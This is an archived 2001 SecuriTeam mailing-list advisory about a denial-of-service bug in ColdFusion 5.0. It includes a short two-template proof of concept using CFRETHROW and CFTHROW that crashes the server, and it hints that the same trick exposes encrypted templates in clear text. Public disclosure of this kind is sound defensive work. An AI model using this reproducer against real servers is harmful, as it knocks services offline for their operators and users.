[NT] Cold Fusion CFRETHROW Exploit
From: support@securiteam.comDate: 07/31/01
- Next message: support@securiteam.com: "[NEWS] Mathematica License Manager DoS"
- Previous message: support@securiteam.com: "[NT] ZoneAlarm Pro's MailSafe Insecurity"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [NT] Cold Fusion CFRETHROW Exploit Message-Id: <20010731203628.85657138C2@mail.der-keiler.de> Date: Tue, 31 Jul 2001 22:36:28 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cold Fusion CFRETHROW Exploit
------------------------------------------------------------------------
SUMMARY
A <http://www.macromedia.com/software/coldfusion/> Cold Fusion bug allows
attackers that are able to create template files to cause the server to
crash. The vulnerability would allow a denial of service attack against
the server.
DETAILS
Vulnerable systems:
Cold Fusion version 5.0
Immune systems:
Cold Fusion version below 5.0
This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.
Create two files, file1.cfm and file2.cfm. Within file1.cfm put the
following code.
--------------------------
<CFTRY>
<CFINCLUDE TEMPLATE="test2.cfm">
<CFCATCH>
Call encrypted tag or include template here
<CFRETHROW>
</CFCATCH>
</CFTRY>
--------------------------
Within file2.cfm put the following code.
--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------
Call any custom tag or template that you want to see in clear text right
after the cfcatch tag. Then call test.cfm from a web browser and the
server should then crash. It might take a couple of refreshes to make the
server crash.
ADDITIONAL INFORMATION
The information has been provided by <mailto:eric@isdn.net> Eric Lackey.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NEWS] Mathematica License Manager DoS"
- Previous message: support@securiteam.com: "[NT] ZoneAlarm Pro's MailSafe Insecurity"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
